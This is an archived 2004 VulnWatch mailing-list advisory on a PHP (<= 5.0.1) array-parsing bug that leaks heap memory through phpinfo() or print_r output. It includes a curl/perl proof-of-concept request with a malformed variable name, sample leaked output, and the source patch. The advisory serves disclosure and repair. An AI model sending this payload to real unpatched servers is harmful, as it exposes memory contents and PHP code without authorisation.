Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] PHP Vulnerability N. 1

from [Stefano Di Paola] Network Security [Permanent Link]
Subject: [VulnWatch] PHP Vulnerability N. 1
Date: Wed, 15 Sep 2004 18:59:41 +0200 
Hi all,
This summer i have been playing around with some php issue
and got some php vulnerabilities..

Let's go for the first one:



==========================================================
Title: php(super)info().
Affected: Php <= 5.0.1
Not Affected: it seems Php <= 4.1.2
Vulnerability Type:  Exposure of sensitive informations
Vendor Status: Fix released on cvs.php.net


==Summary:

Bad array parsing in php_variables.c could lead to show arbitrary memory
content such as pieces of php code and other data.
This affects all GET, POST or COOKIES variables.



==Description:

By appending to a GET/POST/COOKIE variable array a [ (open square
bracket) like abc[a][, 
the length of the 'a' array element is set to the length of variable
name strlen("abc").


$ curl  "http://www.example.com/phpinfo.php"; -d `perl -e 'print
"f"x100;print "[g][=1"'`

where phpinfo.php is:
<?
phpinfo();
?>

or some php file containing print_r function:
<?
print_r($_REQUEST);
?>

it will print the output similar to:
------------------------------------------------
  Array
(
    [ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      ffffffffffffffffffffffffffffffffffffffff] => Array
        (
           
[g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0] => 1
        )
)
-----------------------------------------------

As probably you might have noticed all the garbage shown is memory
content that could be everything (on the heap i suppose). 

I have tried some request and it expose some piece of php code sometime.




==Solution: 
Authors were contacted and they released a fix for this problem.

The problem is easy to fix.

Find and replace around line 136 for php 5.0.1 in main/php_variables.c
from:

index_len = var_len = strlen(var);

to:

index_len = var_len = strlen(index);
and compile again.

But if you're lazy the patch can be found on the CVS
cvs.php.net/main/php_variables.c

=========================================


Stefano Di Paola

....----oOOo-------oOOo----....
Stefano Di Paola
Software Engineer
stefano.dipaola_at_wisec_dot_it
stefano.dipaola1_at_tin_dot_it
--------------------------------
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] PHP Vulnerability N. 1, Stefano Di Paola <=
Previous by Date:  [VulnWatch] myServer 0.7 Directory Traversal Vulnerability, Securiteinfo.com
Next by Date:  [VulnWatch] Php Vulnerability N. 2, Stefano Di Paola
Previous by Thread:  [VulnWatch] myServer 0.7 Directory Traversal Vulnerability, Securiteinfo.com
Next by Thread:  [VulnWatch] Php Vulnerability N. 2, Stefano Di Paola
Indexes:  [Date] [Thread] [Top] [All Lists]